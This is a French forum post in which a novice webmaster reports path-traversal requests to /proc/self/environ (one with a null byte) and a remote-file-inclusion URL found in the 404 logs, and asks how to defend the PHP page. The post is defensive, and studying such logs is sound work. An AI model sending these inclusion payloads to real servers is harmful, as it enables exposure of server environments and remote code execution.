En parcourant mes journaux 404, j'ai remarqué les deux URL suivantes, toutes deux apparues une fois:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
et
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
La page en question library.php
,, nécessite une type
variable avec une demi-douzaine de valeurs acceptables différentes, puis une id
variable. Une URL valide peut donc être
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
et les identifiants sont tous exécutés mysql_real_escape_string
avant d'être utilisés pour interroger la base de données.
Je suis une recrue, mais il me semble que ces deux liens sont de simples attaques contre le webroot?
1) Comment mieux se protéger contre ce genre de choses en plus d'un 404?
2) Dois-je permaban les IP responsables?
EDIT: aussi juste remarqué celui-ci
/library.php=http://www.basfalt.no/scripts/danger.txt
EDIT 2: L'adresse IP incriminée pour les 3 attaques était la 216.97.231.15
trace d'un FAI appelé Lunar Pages situé juste à l'extérieur de Los Angeles.
EDIT 3: J'ai décidé d'appeler le FAI vendredi matin heure locale et de discuter de la question avec qui je peux avoir au téléphone. Je publierai les résultats ici dans 24 heures environ.
EDIT 4: J'ai fini par envoyer un e-mail à leurs administrateurs et ils ont d'abord répondu «qu'ils y réfléchissaient», puis un jour plus tard avec «ce problème devrait être résolu maintenant». Pas plus de détails, malheureusement.
type
dit au script qui inclut à utiliser (bien que via un IF $_GET['type'] == 'thing') {} ESLE...
, pas comme un lien direct comme include 'type.php'
) et le id
soit exécuté via mysql_real_escape_string et qui est utilisé pour les requêtes. Sachant cela, suis-je toujours en sécurité?